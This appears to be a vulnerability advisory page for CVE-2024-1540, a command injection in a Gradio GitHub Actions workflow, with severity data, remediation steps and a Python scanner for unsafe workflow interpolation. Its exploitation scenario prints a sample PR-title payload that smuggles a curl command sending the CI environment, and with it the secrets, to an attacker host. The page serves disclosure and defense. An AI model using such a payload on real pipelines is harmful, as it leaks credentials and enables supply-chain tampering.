CVE-2024-1540: Gradio: CI/CD command injection enables secrets exfil

HIGH PoC AVAILABLE CISA: TRACK*
Published March 27, 2024
CISO Take

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

What is the risk?

High risk (CVSS 8.2) with low attack complexity and no authentication required—any external contributor can trigger this via a crafted PR. Gradio is one of the most widely deployed ML demo and prototype frameworks in the AI ecosystem, meaning the blast radius extends across research labs, startups, and enterprise ML teams. The primary concern is not the Gradio framework code itself but the CI/CD pipeline pattern, which many teams have copied or adapted. Secrets exfiltration is a silent, high-value outcome that may go undetected for weeks.

What systems are affected?

Package  Ecosystem  Vulnerable Range  Patched
Gradio   pip        -                 No patch

Package profile: 43.0K, OpenSSF 5.6, 685 dependents, pushed 4d ago, 26% patched, ~110d to patch

Do you use Gradio? You're affected.

How severe is it?

CVSS 3.1: 8.2 / 10
EPSS: 2.0% chance of exploitation in 30 days (higher than 78% of all CVEs)
Exploitation status: Exploit available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): Low
A (Availability): None

What should I do?

6 steps
  1. Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows.

  2. Audit ALL GitHub Actions workflow files for `run` steps containing `${{ github.event.* }}` or any untrusted context expression—this pattern is the root cause.

  3. Refactor by assigning untrusted inputs to environment variables first (e.g., `ENV_VAR: ${{ github.event.pull_request.title }}`) before referencing them in shell commands.

  4. Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution.

  5. Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs.

  6. Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

What does CISA's SSVC say?

Decision: Track*
Exploitation: poc
Automatable: Yes
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
  A.10.2 - AI Supplier Relationships
  A.5.5 - AI System Security
NIST AI RMF
  GOVERN 1.4 - Organizational Teams and Responsibilities
  MANAGE 2.4 - Mechanisms for Incident Response
OWASP LLM Top 10
  LLM05:2025 - Insecure Plugin Design

Frequently Asked Questions

Is CVE-2024-1540 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-1540, increasing the risk of exploitation.

What systems are affected by CVE-2024-1540?

This vulnerability affects the following AI/ML architecture patterns: ML deployment pipelines, CI/CD workflows, Model training pipelines, Model serving infrastructure.

What is the CVSS score for CVE-2024-1540?

CVE-2024-1540 has a CVSS v3.1 base score of 8.2 (HIGH). The EPSS exploitation probability is 1.98%.

What is the AI security impact?

Affected AI Architectures

  • ML deployment pipelines
  • CI/CD workflows
  • Model training pipelines
  • Model serving infrastructure

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0025 Exfiltration via Cyber Means
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.10.2, A.5.5
NIST AI RMF: GOVERN 1.4, MANAGE 2.4
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due to improper neutralization of special elements used in a command. This vulnerability allows attackers to execute unauthorized commands, potentially leading to unauthorized modification of the base repository or secrets exfiltration. The issue arises from the unsafe handling of GitHub context information within a `run` operation, where expressions inside `${{ }}` are evaluated and substituted before script execution. Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.
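A small scanner in the spirit of step 6 above, added here as an example (it is not Gradio's code or the page's own): it walks a workflow file, collects every `${{ }}` expression that sits inside a `run:` step, and flags the ones that name PR-controlled context, which is exactly the pre-execution interpolation the advisory describes; the same values routed through `env:` (the refactor in step 3) go unflagged. The embedded workflow is constructed, and the list of untrusted contexts is an assumed subset.

```python
import re

# Constructed sample, not Gradio's real deploy+test-visual.yml: step one drops
# PR-controlled context straight into run; step two goes through env vars.
SAMPLE_WORKFLOW = """\
on: pull_request_target
jobs:
  visual:
    runs-on: ubuntu-latest
    steps:
      - name: vulnerable
        run: |
          echo "Testing ${{ github.event.pull_request.title }}"
          ./deploy.sh "${{ github.head_ref }}"
      - name: hardened
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
          HEAD_REF: ${{ github.head_ref }}
        run: |
          echo "Testing $PR_TITLE"
          ./deploy.sh "$HEAD_REF"
"""
EXPR = re.compile(r"\$\{\{[^}]*\}\}")
# Contexts an outside contributor controls (assumed subset; extend as needed).
UNTRUSTED = re.compile(
    r"github\.(event\.(pull_request\.(title|body|head\.(ref|label))"
    r"|issue\.(title|body)|comment\.body|review\.body)|head_ref)\b")
RUN_KEY = re.compile(r"^(\s*)(- )?run:\s*(.*)$")

def find_injectable_runs(workflow_text):
    """Return (line_no, expression) for each ${{ }} inside a run: step that
    names attacker-controlled context; env: values are data, so not flagged."""
    lines, findings, i = workflow_text.splitlines(), [], 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1)) + (2 if m.group(2) else 0)
        body, j = [(i + 1, m.group(3))], i + 1
        # A block scalar (run: |) continues while lines sit deeper than the key.
        while j < len(lines) and (not lines[j].strip()
                or len(lines[j]) - len(lines[j].lstrip()) > key_indent):
            body.append((j + 1, lines[j]))
            j += 1
        findings += [(ln, e) for ln, text in body
                     for e in EXPR.findall(text) if UNTRUSTED.search(e)]
        i = j
    return findings
```

Run `find_injectable_runs(open(path).read())` over each file under `.github/workflows/`; on the sample it reports lines 8 and 9 of the vulnerable step and nothing for the hardened one, because there the value lands in a variable rather than in the generated script text.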

Exploitation Scenario

An adversary forks the Gradio repository or submits a pull request with a crafted PR title or branch name containing shell metacharacters—e.g., `'; curl https://attacker.com/exfil?t=$(cat /proc/self/environ | base64) #`. When the `deploy+test-visual.yml` workflow runs, it interpolates the GitHub context expression directly into a shell `run` step. The injected command executes in the CI runner, exfiltrating the `GITHUB_TOKEN`, any stored cloud provider credentials, and API keys. The attacker can use the `GITHUB_TOKEN` to push malicious commits, tamper with releases, or inject backdoored model artifacts into the deployment pipeline—all without ever having write access to the repository.

Weaknesses (CWE)

CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Implementation] If possible, ensure that all external commands called from the program are statically created.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Timeline

Published: March 27, 2024
Last Modified: July 30, 2025
First Seen: March 27, 2024

Related Vulnerabilities